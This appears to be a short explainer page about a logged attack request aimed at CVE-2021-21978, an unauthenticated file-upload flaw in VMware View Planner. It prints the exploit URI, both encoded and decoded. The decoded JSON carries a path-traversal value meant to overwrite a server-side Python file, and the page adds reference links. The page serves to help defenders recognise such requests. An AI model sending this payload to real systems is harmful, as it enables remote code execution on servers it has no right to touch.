What is loadupload?logMetaData?

Created 23rd January 2024
Updated 23rd January 2024

CVE-2021-21978

Queries of this nature are looking for an exploit with VMWare View Planner 4.x, an unauthenticated file uploader, allowing remote code execution.

The full URI and query that was used against this server read /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D. There is a URI encoded JSON blob assigned to the logMetaData parameter, which is trying to exploit an unauthenticated endpoint.

Encoded/Logged	Decoded
%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D	{"itrLogPath": "../../../../../../etc/httpd/html/wsgi_log_upload", "logFileType": "log_upload_wsgi.py", "workloadID": "2"}

---

References

1. https://attackerkb.com/topics/84gfOVMN35/cve-2021-21978
2. https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305
3. https://twitter.com/wugeej/status/1369476795255320580?lang=en-GB
4. https://www.vmware.com/security/advisories/VMSA-2021-0003.html

---

Other known request paths

1. loadupload?logMetaData